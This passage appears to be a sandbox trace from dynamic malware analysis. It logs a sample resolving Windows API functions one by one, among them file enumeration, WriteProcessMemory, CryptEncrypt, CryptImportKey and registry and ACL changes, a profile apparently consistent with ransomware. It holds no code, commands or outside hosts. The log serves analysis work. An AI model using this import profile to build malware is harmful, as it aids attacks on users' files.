0x75a540fb [0337.912] SetErrorMode (uMode=0x8001) returned 0x0 [0337.912] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.912] SetErrorMode (uMode=0x0) returned 0x8001 [0337.912] GetProcAddress (hModule=0x759c0000, lpProcName="GetLogicalDrives") returned 0x759d5371 [0337.912] SetErrorMode (uMode=0x8001) returned 0x0 [0337.912] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.912] SetErrorMode (uMode=0x0) returned 0x8001 [0337.913] GetProcAddress (hModule=0x759c0000, lpProcName="GetDriveTypeW") returned 0x759d418b [0337.913] SetErrorMode (uMode=0x8001) returned 0x0 [0337.913] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.913] SetErrorMode (uMode=0x0) returned 0x8001 [0337.913] GetProcAddress (hModule=0x759c0000, lpProcName="GetUserDefaultUILanguage") returned 0x759d44ab [0337.913] SetErrorMode (uMode=0x8001) returned 0x0 [0337.913] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.913] SetErrorMode (uMode=0x0) returned 0x8001 [0337.913] GetProcAddress (hModule=0x759c0000, lpProcName="CopyFileExW") returned 0x759f3b92 [0337.913] SetErrorMode (uMode=0x8001) returned 0x0 [0337.913] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.913] SetErrorMode (uMode=0x0) returned 0x8001 [0337.913] GetProcAddress (hModule=0x759c0000, lpProcName="GetEnvironmentVariableW") returned 0x759d1b48 [0337.913] SetErrorMode (uMode=0x8001) returned 0x0 [0337.913] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.913] SetErrorMode (uMode=0x0) returned 0x8001 [0337.913] GetProcAddress (hModule=0x759c0000, lpProcName="SetFilePointer") returned 0x759d17d1 [0337.913] SetErrorMode (uMode=0x8001) returned 0x0 [0337.914] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.914] SetErrorMode (uMode=0x0) returned 0x8001 [0337.914] GetProcAddress (hModule=0x759c0000, lpProcName="InitializeCriticalSection") returned 0x77ce2c42 [0337.914] SetErrorMode (uMode=0x8001) returned 0x0 [0337.914] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.914] SetErrorMode (uMode=0x0) returned 0x8001 [0337.914] GetProcAddress (hModule=0x759c0000, lpProcName="GetTimeZoneInformation") returned 0x759d465a [0337.914] SetErrorMode (uMode=0x8001) returned 0x0 [0337.914] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.914] SetErrorMode (uMode=0x0) returned 0x8001 [0337.914] GetProcAddress (hModule=0x759c0000, lpProcName="MultiByteToWideChar") returned 0x759d192e [0337.914] SetErrorMode (uMode=0x8001) returned 0x0 [0337.914] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.914] SetErrorMode (uMode=0x0) returned 0x8001 [0337.914] GetProcAddress (hModule=0x759c0000, lpProcName="SetFileAttributesW") returned 0x759ed4f7 [0337.914] SetErrorMode (uMode=0x8001) returned 0x0 [0337.914] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.915] SetErrorMode (uMode=0x0) returned 0x8001 [0337.915] GetProcAddress (hModule=0x759c0000, lpProcName="GetVolumeNameForVolumeMountPointW") returned 0x759e052f [0337.915] SetErrorMode (uMode=0x8001) returned 0x0 [0337.915] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.915] SetErrorMode (uMode=0x0) returned 0x8001 [0337.915] GetProcAddress (hModule=0x759c0000, lpProcName="OpenProcess") returned 0x759d1986 [0337.915] SetErrorMode (uMode=0x8001) returned 0x0 [0337.915] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.915] SetErrorMode (uMode=0x0) returned 0x8001 [0337.915] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileTime") returned 0x759d4407 [0337.915] SetErrorMode (uMode=0x8001) returned 0x0 [0337.915] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.915] SetErrorMode (uMode=0x0) returned 0x8001 [0337.915] GetProcAddress (hModule=0x759c0000, lpProcName="ReleaseMutex") returned 0x759d111e [0337.915] SetErrorMode (uMode=0x8001) returned 0x0 [0337.915] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.915] SetErrorMode (uMode=0x0) returned 0x8001 [0337.916] GetProcAddress (hModule=0x759c0000, lpProcName="LeaveCriticalSection") returned 0x77cd2270 [0337.916] SetErrorMode (uMode=0x8001) returned 0x0 [0337.916] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.916] SetErrorMode (uMode=0x0) returned 0x8001 [0337.916] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleFileNameW") returned 0x759d4950 [0337.916] SetErrorMode (uMode=0x8001) returned 0x0 [0337.916] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.916] SetErrorMode (uMode=0x0) returned 0x8001 [0337.916] GetProcAddress (hModule=0x759c0000, lpProcName="SetFileTime") returned 0x759eecbb [0337.916] SetErrorMode (uMode=0x8001) returned 0x0 [0337.916] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.916] SetErrorMode (uMode=0x0) returned 0x8001 [0337.916] GetProcAddress (hModule=0x759c0000, lpProcName="RemoveDirectoryW") returned 0x75a544cf [0337.916] SetErrorMode (uMode=0x8001) returned 0x0 [0337.916] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.916] SetErrorMode (uMode=0x0) returned 0x8001 [0337.916] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAlloc") returned 0x759d1856 [0337.916] SetErrorMode (uMode=0x8001) returned 0x0 [0337.916] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.917] SetErrorMode (uMode=0x0) returned 0x8001 [0337.917] GetProcAddress (hModule=0x759c0000, lpProcName="ExpandEnvironmentStringsW") returned 0x759d4173 [0337.917] SetErrorMode (uMode=0x8001) returned 0x0 [0337.917] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.917] SetErrorMode (uMode=0x0) returned 0x8001 [0337.917] GetProcAddress (hModule=0x759c0000, lpProcName="WriteFile") returned 0x759d1282 [0337.917] SetErrorMode (uMode=0x8001) returned 0x0 [0337.917] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.917] SetErrorMode (uMode=0x0) returned 0x8001 [0337.917] GetProcAddress (hModule=0x759c0000, lpProcName="FindNextFileW") returned 0x759d54ee [0337.917] SetErrorMode (uMode=0x8001) returned 0x0 [0337.917] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.917] SetErrorMode (uMode=0x0) returned 0x8001 [0337.917] GetProcAddress (hModule=0x759c0000, lpProcName="EnterCriticalSection") returned 0x77cd22b0 [0337.917] SetErrorMode (uMode=0x8001) returned 0x0 [0337.917] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.917] SetErrorMode (uMode=0x0) returned 0x8001 [0337.918] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileAttributesW") returned 0x759d1b18 [0337.918] SetErrorMode (uMode=0x8001) returned 0x0 [0337.918] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.918] SetErrorMode (uMode=0x0) returned 0x8001 [0337.918] GetProcAddress (hModule=0x759c0000, lpProcName="FindClose") returned 0x759d4442 [0337.918] SetErrorMode (uMode=0x8001) returned 0x0 [0337.918] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.918] SetErrorMode (uMode=0x0) returned 0x8001 [0337.918] GetProcAddress (hModule=0x759c0000, lpProcName="OpenEventW") returned 0x759d15d6 [0337.918] SetErrorMode (uMode=0x8001) returned 0x0 [0337.918] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.918] SetErrorMode (uMode=0x0) returned 0x8001 [0337.918] GetProcAddress (hModule=0x759c0000, lpProcName="GetTempPathW") returned 0x759ed4dc [0337.918] SetErrorMode (uMode=0x8001) returned 0x0 [0337.918] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.918] SetErrorMode (uMode=0x0) returned 0x8001 [0337.918] GetProcAddress (hModule=0x759c0000, lpProcName="SetLastError") returned 0x759d11a9 [0337.918] SetErrorMode (uMode=0x8001) returned 0x0 [0337.918] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.919] SetErrorMode (uMode=0x0) returned 0x8001 [0337.919] GetProcAddress (hModule=0x759c0000, lpProcName="HeapFree") returned 0x759d14c9 [0337.919] SetErrorMode (uMode=0x8001) returned 0x0 [0337.919] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.919] SetErrorMode (uMode=0x0) returned 0x8001 [0337.919] GetProcAddress (hModule=0x759c0000, lpProcName="HeapCreate") returned 0x759d4a2d [0337.919] SetErrorMode (uMode=0x8001) returned 0x0 [0337.919] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.919] SetErrorMode (uMode=0x0) returned 0x8001 [0337.919] GetProcAddress (hModule=0x759c0000, lpProcName="WriteProcessMemory") returned 0x759ed9e0 [0337.919] SetErrorMode (uMode=0x8001) returned 0x0 [0337.919] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.919] SetErrorMode (uMode=0x0) returned 0x8001 [0337.919] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileSizeEx") returned 0x759d59e2 [0337.919] SetErrorMode (uMode=0x8001) returned 0x0 [0337.920] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.920] SetErrorMode (uMode=0x0) returned 0x8001 [0337.920] GetProcAddress (hModule=0x759c0000, lpProcName="FindFirstFileW") returned 0x759d4435 [0337.920] SetErrorMode (uMode=0x8001) returned 0x0 [0337.920] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.920] SetErrorMode (uMode=0x0) returned 0x8001 [0337.920] GetProcAddress (hModule=0x759c0000, lpProcName="InterlockedExchange") returned 0x759d1462 [0337.920] SetErrorMode (uMode=0x8001) returned 0x0 [0337.920] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.920] SetErrorMode (uMode=0x0) returned 0x8001 [0337.920] GetProcAddress (hModule=0x759c0000, lpProcName="GetVolumeInformationW") returned 0x759ec860 [0337.920] SetErrorMode (uMode=0x8001) returned 0x0 [0337.920] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.920] SetErrorMode (uMode=0x0) returned 0x8001 [0337.920] GetProcAddress (hModule=0x759c0000, lpProcName="ReadFile") returned 0x759d3ed3 [0337.920] SetErrorMode (uMode=0x8001) returned 0x0 [0337.920] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.920] SetErrorMode (uMode=0x0) returned 0x8001 [0337.921] GetProcAddress (hModule=0x759c0000, lpProcName="CreateDirectoryW") returned 0x759d4259 [0337.921] SetErrorMode (uMode=0x8001) returned 0x0 [0337.921] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.921] SetErrorMode (uMode=0x0) returned 0x8001 [0337.921] GetProcAddress (hModule=0x759c0000, lpProcName="FreeLibrary") returned 0x759d34c8 [0337.921] SetErrorMode (uMode=0x8001) returned 0x0 [0337.921] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.921] SetErrorMode (uMode=0x0) returned 0x8001 [0337.921] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleHandleW") returned 0x759d34b0 [0337.921] SetErrorMode (uMode=0x8001) returned 0x0 [0337.921] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.921] SetErrorMode (uMode=0x0) returned 0x8001 [0337.921] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcAddress") returned 0x759d1222 [0337.921] SetErrorMode (uMode=0x8001) returned 0x0 [0337.921] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.921] SetErrorMode (uMode=0x0) returned 0x8001 [0337.921] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryW") returned 0x759d492b [0337.922] SetErrorMode (uMode=0x8001) returned 0x0 [0337.922] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.922] SetErrorMode (uMode=0x0) returned 0x8001 [0337.922] GetProcAddress (hModule=0x759c0000, lpProcName="Process32FirstW") returned 0x759f8baf [0337.922] SetErrorMode (uMode=0x8001) returned 0x0 [0337.922] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.922] SetErrorMode (uMode=0x0) returned 0x8001 [0337.922] GetProcAddress (hModule=0x759c0000, lpProcName="Process32NextW") returned 0x759f896c [0337.922] SetErrorMode (uMode=0x8001) returned 0x0 [0337.922] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.922] SetErrorMode (uMode=0x0) returned 0x8001 [0337.922] GetProcAddress (hModule=0x759c0000, lpProcName="GetLastError") returned 0x759d11c0 [0337.922] SetErrorMode (uMode=0x8001) returned 0x0 [0337.922] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.922] SetErrorMode (uMode=0x0) returned 0x8001 [0337.922] GetProcAddress (hModule=0x759c0000, lpProcName="CreateToolhelp32Snapshot") returned 0x759f735f [0337.922] SetErrorMode (uMode=0x8001) returned 0x0 [0337.922] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.923] SetErrorMode (uMode=0x0) returned 0x8001 [0337.923] GetProcAddress (hModule=0x759c0000, lpProcName="CreateFileW") returned 0x759d3f5c [0337.923] SetErrorMode (uMode=0x8001) returned 0x0 [0337.923] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.923] SetErrorMode (uMode=0x0) returned 0x8001 [0337.923] GetProcAddress (hModule=0x759c0000, lpProcName="CreateMutexW") returned 0x759d424c [0337.923] SetErrorMode (uMode=0x8001) returned 0x0 [0337.923] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.923] SetErrorMode (uMode=0x0) returned 0x8001 [0337.923] GetProcAddress (hModule=0x759c0000, lpProcName="ResetEvent") returned 0x759d16dd [0337.923] SetErrorMode (uMode=0x8001) returned 0x0 [0337.923] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.923] SetErrorMode (uMode=0x0) returned 0x8001 [0337.923] GetProcAddress (hModule=0x759c0000, lpProcName="CloseHandle") returned 0x759d1410 [0337.923] SetErrorMode (uMode=0x8001) returned 0x0 [0337.923] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.923] SetErrorMode (uMode=0x0) returned 0x8001 [0337.924] GetProcAddress (hModule=0x759c0000, lpProcName="SetEvent") returned 0x759d16c5 [0337.924] SetErrorMode (uMode=0x8001) returned 0x0 [0337.924] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.924] SetErrorMode (uMode=0x0) returned 0x8001 [0337.924] GetProcAddress (hModule=0x759c0000, lpProcName="Sleep") returned 0x759d10ff [0337.924] SetErrorMode (uMode=0x8001) returned 0x0 [0337.924] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.924] SetErrorMode (uMode=0x0) returned 0x8001 [0337.924] GetProcAddress (hModule=0x759c0000, lpProcName="CreateEventW") returned 0x759d183e [0337.924] SetErrorMode (uMode=0x8001) returned 0x0 [0337.924] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.924] SetErrorMode (uMode=0x0) returned 0x8001 [0337.924] GetProcAddress (hModule=0x759c0000, lpProcName="WaitForSingleObject") returned 0x759d1136 [0337.924] SetErrorMode (uMode=0x8001) returned 0x0 [0337.924] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.924] SetErrorMode (uMode=0x0) returned 0x8001 [0337.924] GetProcAddress (hModule=0x759c0000, lpProcName="WaitForMultipleObjects") returned 0x759d4220 [0337.924] SetErrorMode (uMode=0x8001) returned 0x0 [0337.924] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.925] SetErrorMode (uMode=0x0) returned 0x8001 [0337.925] GetProcAddress (hModule=0x759c0000, lpProcName="GetTickCount") returned 0x759d110c [0337.925] SetErrorMode (uMode=0x8001) returned 0x0 [0337.925] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0337.925] SetErrorMode (uMode=0x0) returned 0x8001 [0337.925] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualFree") returned 0x759d186e [0337.925] SetErrorMode (uMode=0x8001) returned 0x0 [0337.925] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.925] SetErrorMode (uMode=0x0) returned 0x8001 [0337.925] GetProcAddress (hModule=0x758c0000, lpProcName="GetIconInfo") returned 0x758e49ea [0337.925] SetErrorMode (uMode=0x8001) returned 0x0 [0337.925] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.925] SetErrorMode (uMode=0x0) returned 0x8001 [0337.925] GetProcAddress (hModule=0x758c0000, lpProcName="DrawIcon") returned 0x758e8deb [0337.925] SetErrorMode (uMode=0x8001) returned 0x0 [0337.925] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.925] SetErrorMode (uMode=0x0) returned 0x8001 [0337.926] GetProcAddress (hModule=0x758c0000, lpProcName="LoadImageW") returned 0x758dfbd1 [0337.926] SetErrorMode (uMode=0x8001) returned 0x0 [0337.926] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.926] SetErrorMode (uMode=0x0) returned 0x8001 [0337.926] GetProcAddress (hModule=0x758c0000, lpProcName="GetCursorPos") returned 0x758e1218 [0337.926] SetErrorMode (uMode=0x8001) returned 0x0 [0337.926] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.926] SetErrorMode (uMode=0x0) returned 0x8001 [0337.926] GetProcAddress (hModule=0x758c0000, lpProcName="DefWindowProcW") returned 0x77ce25dd [0337.926] SetErrorMode (uMode=0x8001) returned 0x0 [0337.926] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.926] SetErrorMode (uMode=0x0) returned 0x8001 [0337.926] GetProcAddress (hModule=0x758c0000, lpProcName="CreateWindowExW") returned 0x758d8a29 [0337.926] SetErrorMode (uMode=0x8001) returned 0x0 [0337.926] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.926] SetErrorMode (uMode=0x0) returned 0x8001 [0337.926] GetProcAddress (hModule=0x758c0000, lpProcName="UnregisterClassW") returned 0x758d9f84 [0337.926] SetErrorMode (uMode=0x8001) returned 0x0 [0337.927] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.927] SetErrorMode (uMode=0x0) returned 0x8001 [0337.927] GetProcAddress (hModule=0x758c0000, lpProcName="GetKeyboardLayoutList") returned 0x758e2e69 [0337.927] SetErrorMode (uMode=0x8001) returned 0x0 [0337.927] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.927] SetErrorMode (uMode=0x0) returned 0x8001 [0337.927] GetProcAddress (hModule=0x758c0000, lpProcName="CharLowerA") returned 0x758e3e75 [0337.927] SetErrorMode (uMode=0x8001) returned 0x0 [0337.927] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.927] SetErrorMode (uMode=0x0) returned 0x8001 [0337.927] GetProcAddress (hModule=0x758c0000, lpProcName="CharToOemW") returned 0x75931a26 [0337.927] SetErrorMode (uMode=0x8001) returned 0x0 [0337.927] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.927] SetErrorMode (uMode=0x0) returned 0x8001 [0337.927] GetProcAddress (hModule=0x758c0000, lpProcName="TranslateMessage") returned 0x758d7809 [0337.927] SetErrorMode (uMode=0x8001) returned 0x0 [0337.927] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.927] SetErrorMode (uMode=0x0) returned 0x8001 [0337.928] GetProcAddress (hModule=0x758c0000, lpProcName="PeekMessageW") returned 0x758e05ba [0337.928] SetErrorMode (uMode=0x8001) returned 0x0 [0337.928] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.928] SetErrorMode (uMode=0x0) returned 0x8001 [0337.928] GetProcAddress (hModule=0x758c0000, lpProcName="DispatchMessageW") returned 0x758d787b [0337.928] SetErrorMode (uMode=0x8001) returned 0x0 [0337.928] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.928] SetErrorMode (uMode=0x0) returned 0x8001 [0337.928] GetProcAddress (hModule=0x758c0000, lpProcName="MsgWaitForMultipleObjects") returned 0x758e0b4a [0337.928] SetErrorMode (uMode=0x8001) returned 0x0 [0337.928] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.928] SetErrorMode (uMode=0x0) returned 0x8001 [0337.928] GetProcAddress (hModule=0x758c0000, lpProcName="RegisterClassExW") returned 0x758db17d [0337.928] SetErrorMode (uMode=0x8001) returned 0x0 [0337.928] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.928] SetErrorMode (uMode=0x0) returned 0x8001 [0337.928] GetProcAddress (hModule=0x758c0000, lpProcName="SetWindowLongA") returned 0x758e6110 [0337.929] SetErrorMode (uMode=0x8001) returned 0x0 [0337.929] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.929] SetErrorMode (uMode=0x0) returned 0x8001 [0337.929] GetProcAddress (hModule=0x758c0000, lpProcName="GetWindowLongA") returned 0x758dd156 [0337.929] SetErrorMode (uMode=0x8001) returned 0x0 [0337.929] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.929] SetErrorMode (uMode=0x0) returned 0x8001 [0337.929] GetProcAddress (hModule=0x758c0000, lpProcName="CharUpperW") returned 0x758df350 [0337.929] SetErrorMode (uMode=0x8001) returned 0x0 [0337.929] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0337.929] SetErrorMode (uMode=0x0) returned 0x8001 [0337.929] GetProcAddress (hModule=0x758c0000, lpProcName="DestroyWindow") returned 0x758d9a55 [0337.929] SetErrorMode (uMode=0x8001) returned 0x0 [0337.929] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x76240000 [0337.931] SetErrorMode (uMode=0x0) returned 0x8001 [0337.931] GetProcAddress (hModule=0x76240000, lpProcName="CryptImportPublicKeyInfo") returned 0x76256c0e [0337.931] SetErrorMode (uMode=0x8001) returned 0x0 [0337.931] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x76240000 [0337.931] SetErrorMode (uMode=0x0) returned 0x8001 [0337.931] GetProcAddress (hModule=0x76240000, lpProcName="CryptDecodeObjectEx") returned 0x7624d718 [0337.931] SetErrorMode (uMode=0x8001) returned 0x0 [0337.931] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.931] SetErrorMode (uMode=0x0) returned 0x8001 [0337.931] GetProcAddress (hModule=0x77740000, lpProcName="RegCloseKey") returned 0x7775469d [0337.931] SetErrorMode (uMode=0x8001) returned 0x0 [0337.931] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.931] SetErrorMode (uMode=0x0) returned 0x8001 [0337.932] GetProcAddress (hModule=0x77740000, lpProcName="GetAce") returned 0x777545f0 [0337.932] SetErrorMode (uMode=0x8001) returned 0x0 [0337.932] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.932] SetErrorMode (uMode=0x0) returned 0x8001 [0337.932] GetProcAddress (hModule=0x77740000, lpProcName="CryptEncrypt") returned 0x7776779b [0337.932] SetErrorMode (uMode=0x8001) returned 0x0 [0337.932] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.932] SetErrorMode (uMode=0x0) returned 0x8001 [0337.932] GetProcAddress (hModule=0x77740000, lpProcName="GetSidSubAuthorityCount") returned 0x77750e0c [0337.932] SetErrorMode (uMode=0x8001) returned 0x0 [0337.932] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.932] SetErrorMode (uMode=0x0) returned 0x8001 [0337.932] GetProcAddress (hModule=0x77740000, lpProcName="AllocateAndInitializeSid") returned 0x777540e6 [0337.932] SetErrorMode (uMode=0x8001) returned 0x0 [0337.932] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.932] SetErrorMode (uMode=0x0) returned 0x8001 [0337.933] GetProcAddress (hModule=0x77740000, lpProcName="GetSidSubAuthority") returned 0x77750e24 [0337.933] SetErrorMode (uMode=0x8001) returned 0x0 [0337.933] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.933] SetErrorMode (uMode=0x0) returned 0x8001 [0337.933] GetProcAddress (hModule=0x77740000, lpProcName="SetEntriesInAclW") returned 0x77752a66 [0337.933] SetErrorMode (uMode=0x8001) returned 0x0 [0337.933] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.933] SetErrorMode (uMode=0x0) returned 0x8001 [0337.933] GetProcAddress (hModule=0x77740000, lpProcName="RegCreateKeyExW") returned 0x777540fe [0337.933] SetErrorMode (uMode=0x8001) returned 0x0 [0337.933] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.933] SetErrorMode (uMode=0x0) returned 0x8001 [0337.933] GetProcAddress (hModule=0x77740000, lpProcName="CryptVerifySignatureW") returned 0x7774c54a [0337.933] SetErrorMode (uMode=0x8001) returned 0x0 [0337.933] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.933] SetErrorMode (uMode=0x0) returned 0x8001 [0337.933] GetProcAddress (hModule=0x77740000, lpProcName="SetNamedSecurityInfoW") returned 0x77749fe2 [0337.933] SetErrorMode (uMode=0x8001) returned 0x0 [0337.933] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.934] SetErrorMode (uMode=0x0) returned 0x8001 [0337.934] GetProcAddress (hModule=0x77740000, lpProcName="GetNamedSecurityInfoW") returned 0x7774f4fd [0337.934] SetErrorMode (uMode=0x8001) returned 0x0 [0337.934] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.934] SetErrorMode (uMode=0x0) returned 0x8001 [0337.934] GetProcAddress (hModule=0x77740000, lpProcName="CryptCreateHash") returned 0x7774df4e [0337.934] SetErrorMode (uMode=0x8001) returned 0x0 [0337.934] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.934] SetErrorMode (uMode=0x0) returned 0x8001 [0337.934] GetProcAddress (hModule=0x77740000, lpProcName="CryptHashData") returned 0x7774df36 [0337.934] SetErrorMode (uMode=0x8001) returned 0x0 [0337.934] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.934] SetErrorMode (uMode=0x0) returned 0x8001 [0337.934] GetProcAddress (hModule=0x77740000, lpProcName="SetSecurityDescriptorSacl") returned 0x77754680 [0337.934] SetErrorMode (uMode=0x8001) returned 0x0 [0337.934] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.934] SetErrorMode (uMode=0x0) returned 0x8001 [0337.935] GetProcAddress (hModule=0x77740000, lpProcName="RegSetValueExW") returned 0x777514d6 [0337.935] SetErrorMode (uMode=0x8001) returned 0x0 [0337.935] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.935] SetErrorMode (uMode=0x0) returned 0x8001 [0337.935] GetProcAddress (hModule=0x77740000, lpProcName="CryptDestroyHash") returned 0x7774df66 [0337.935] SetErrorMode (uMode=0x8001) returned 0x0 [0337.935] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.935] SetErrorMode (uMode=0x0) returned 0x8001 [0337.935] GetProcAddress (hModule=0x77740000, lpProcName="OpenProcessToken") returned 0x77754304 [0337.935] SetErrorMode (uMode=0x8001) returned 0x0 [0337.935] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.935] SetErrorMode (uMode=0x0) returned 0x8001 [0337.935] GetProcAddress (hModule=0x77740000, lpProcName="FreeSid") returned 0x7775412e [0337.935] SetErrorMode (uMode=0x8001) returned 0x0 [0337.935] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.935] SetErrorMode (uMode=0x0) returned 0x8001 [0337.936] GetProcAddress (hModule=0x77740000, lpProcName="InitializeSecurityDescriptor") returned 0x77754620 [0337.936] SetErrorMode (uMode=0x8001) returned 0x0 [0337.936] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.936] SetErrorMode (uMode=0x0) returned 0x8001 [0337.936] GetProcAddress (hModule=0x77740000, lpProcName="RegOpenKeyExW") returned 0x7775468d [0337.936] SetErrorMode (uMode=0x8001) returned 0x0 [0337.936] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.936] SetErrorMode (uMode=0x0) returned 0x8001 [0337.936] GetProcAddress (hModule=0x77740000, lpProcName="CryptImportKey") returned 0x7774c532 [0337.936] SetErrorMode (uMode=0x8001) returned 0x0 